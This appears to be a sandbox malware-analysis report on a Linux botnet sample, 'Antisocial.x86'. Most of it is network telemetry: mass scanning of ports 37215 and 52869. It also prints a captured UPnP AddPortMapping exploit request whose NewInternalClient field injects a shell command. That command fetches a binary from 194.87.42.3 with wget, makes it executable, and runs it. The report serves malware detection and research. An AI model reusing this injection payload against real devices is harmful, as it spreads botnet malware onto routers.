Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 156.97.116.222:37215
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.79.99.193:37215
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.22.182.162:37215
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 156.235.196.131:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.190.144.77:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.189.116.48:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.109.100.108:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.113.175.89:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.80.62.167:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.54.165.128:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.90.94.85:37215
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.52.27.15:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.198.76.49:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.38.18.65:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.249.40.157:37215

Source: unknown	Network traffic detected: HTTP traffic on port 39546 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39546
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 207.138.67.99
Source: unknown	TCP traffic detected without corresponding DNS query: 104.200.27.99
Source: unknown	TCP traffic detected without corresponding DNS query: 106.144.95.79
Source: unknown	TCP traffic detected without corresponding DNS query: 13.43.47.121
Source: unknown	TCP traffic detected without corresponding DNS query: 186.142.254.75
Source: unknown	TCP traffic detected without corresponding DNS query: 213.236.71.188
Source: unknown	TCP traffic detected without corresponding DNS query: 8.148.56.89
Source: unknown	TCP traffic detected without corresponding DNS query: 72.93.117.95
Source: unknown	TCP traffic detected without corresponding DNS query: 5.233.78.16
Source: unknown	TCP traffic detected without corresponding DNS query: 60.1.139.98
Source: unknown	TCP traffic detected without corresponding DNS query: 179.238.37.69
Source: unknown	TCP traffic detected without corresponding DNS query: 187.87.85.142
Source: unknown	TCP traffic detected without corresponding DNS query: 77.227.68.197
Source: unknown	TCP traffic detected without corresponding DNS query: 193.34.188.111
Source: unknown	TCP traffic detected without corresponding DNS query: 71.100.14.39
Source: unknown	TCP traffic detected without corresponding DNS query: 179.45.121.66
Source: unknown	TCP traffic detected without corresponding DNS query: 78.9.69.18
Source: unknown	TCP traffic detected without corresponding DNS query: 198.79.175.136
Source: unknown	TCP traffic detected without corresponding DNS query: 193.33.227.100
Source: unknown	TCP traffic detected without corresponding DNS query: 149.221.89.8
Source: unknown	TCP traffic detected without corresponding DNS query: 111.214.67.74
Source: unknown	TCP traffic detected without corresponding DNS query: 183.105.172.6
Source: unknown	TCP traffic detected without corresponding DNS query: 130.154.247.74
Source: unknown	TCP traffic detected without corresponding DNS query: 158.45.163.93
Source: unknown	TCP traffic detected without corresponding DNS query: 144.244.129.159
Source: unknown	TCP traffic detected without corresponding DNS query: 20.183.123.69
Source: unknown	TCP traffic detected without corresponding DNS query: 95.101.26.229
Source: unknown	TCP traffic detected without corresponding DNS query: 128.58.218.126
Source: unknown	TCP traffic detected without corresponding DNS query: 24.166.102.162
Source: unknown	TCP traffic detected without corresponding DNS query: 128.133.50.236
Source: unknown	TCP traffic detected without corresponding DNS query: 193.39.143.6
Source: unknown	TCP traffic detected without corresponding DNS query: 216.253.116.194
Source: unknown	TCP traffic detected without corresponding DNS query: 165.35.148.240
Source: unknown	TCP traffic detected without corresponding DNS query: 37.20.117.184
Source: unknown	TCP traffic detected without corresponding DNS query: 203.102.36.35
Source: unknown	TCP traffic detected without corresponding DNS query: 175.16.17.102
Source: unknown	TCP traffic detected without corresponding DNS query: 172.66.82.25
Source: unknown	TCP traffic detected without corresponding DNS query: 204.167.144.120
Source: unknown	TCP traffic detected without corresponding DNS query: 182.169.159.238
Source: unknown	TCP traffic detected without corresponding DNS query: 34.44.223.227
Source: unknown	TCP traffic detected without corresponding DNS query: 32.19.229.238
Source: unknown	TCP traffic detected without corresponding DNS query: 24.207.100.219
Source: unknown	TCP traffic detected without corresponding DNS query: 188.124.16.237
Source: unknown	TCP traffic detected without corresponding DNS query: 191.118.116.75
Source: unknown	TCP traffic detected without corresponding DNS query: 35.161.21.254
Source: unknown	TCP traffic detected without corresponding DNS query: 77.187.188.148
Source: unknown	TCP traffic detected without corresponding DNS query: 98.232.194.151
Source: unknown	TCP traffic detected without corresponding DNS query: 101.116.7.164
Source: unknown	TCP traffic detected without corresponding DNS query: 17.227.225.153
Source: unknown	TCP traffic detected without corresponding DNS query: 111.51.72.233

Source: Antisocial.x86, 5225.1.000000001a887bdc.000000001843e942.r-x.sdmp	String found in binary or memory: http://194.87.42.3/Anti_Bins/Antisocial.mips
Source: Antisocial.x86, 5225.1.000000001a887bdc.000000001843e942.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Antisocial.x86, 5225.1.000000001a887bdc.000000001843e942.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: motd-news.48.dr	String found in binary or memory: https://ubuntu.com/blog/microk8s-memory-optimisation

Source: unknown

HTTP traffic detected: POST /picdesc.xml HTTP/1.1Host: 127.0.0.1:52869Content-Length: 630Accept-Encoding: gzip, deflateSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMappingAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Connection: keep-aliveData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6e 69 67 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 38 37 2e 34 32 2e 33 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 20 2d 4f 20 6e 69 67 3b 20 63 68 6d 6f 64 20 37 37 37 20 6e 69 67 3b 20 2e 2f 6e 69 67 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://194.87.42.3/Anti_Bins/Antisocial.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDurati

Source: unknown

HTTPS traffic detected: 34.249.145.219:443 -> 192.168.2.23:39546 version: TLS 1.2

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal84.troj.linX86@0/1@0/0

Source: Antisocial.x86

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: /usr/bin/dash (PID: 5276)

Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.zwbUWO1Xs3 /tmp/tmp.7ybUxelKh4 /tmp/tmp.tWQiSu25Ld

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 58860 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58860 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58860 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56630 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58860 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58860 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56630 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45376 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48154 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45380 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48170 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58860 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52172 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52172 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56630 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52172 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32922 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41278 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32936 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53336 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53338 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60076 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52484 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41278 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32922 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52172 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32936 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41278 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32922 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32936 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33960 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33972 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58326 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58328 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58860 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52484 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60076 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42454 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48558 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50392 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 42454
Source: unknown	Network traffic detected: HTTP traffic on port 42462 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51452 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 42462
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41278 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59298 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37192 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52172 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32936 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36916 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32922 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36906 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60764 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47728 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46750 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60764 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60764 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59324 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59326 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41278 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50996 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45380 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45386 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47356 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47398 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52484 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60076 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36906 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56630 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47728 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39358 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39398 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60764 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39398 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39398 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32936 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53370 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39398 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32922 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60090 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41784 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41214 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53370 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39358 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33472 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51248 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39398 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41784 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53152 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52172 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51248 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33472 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53370 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60764 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51248 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33472 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36906 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41784 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41214 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47728 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33464 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38296 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53564 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38300 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48318 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42874 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51248 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53564 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53370 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48318 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33472 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39398 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37024 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 37024
Source: unknown	Network traffic detected: HTTP traffic on port 51026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53152 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42874 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53564 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48318 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39358 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41784 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42874 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58860 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41804 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51248 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40736 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53564 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60076 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52484 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40738 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48318 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45952 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41214 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60558 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60560 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35208 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33472 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35208 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32936 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42874 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53370 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60764 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33442 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53152 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32922 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35208 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33442 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33458 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45952 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53564 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39398 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48318 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57462 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33442 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41784 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33458 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50686 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36906 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40706 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33458 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32988 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39210 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59426 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51248 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59426 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33442 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35208 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40706 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59426 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37872 -> 52869
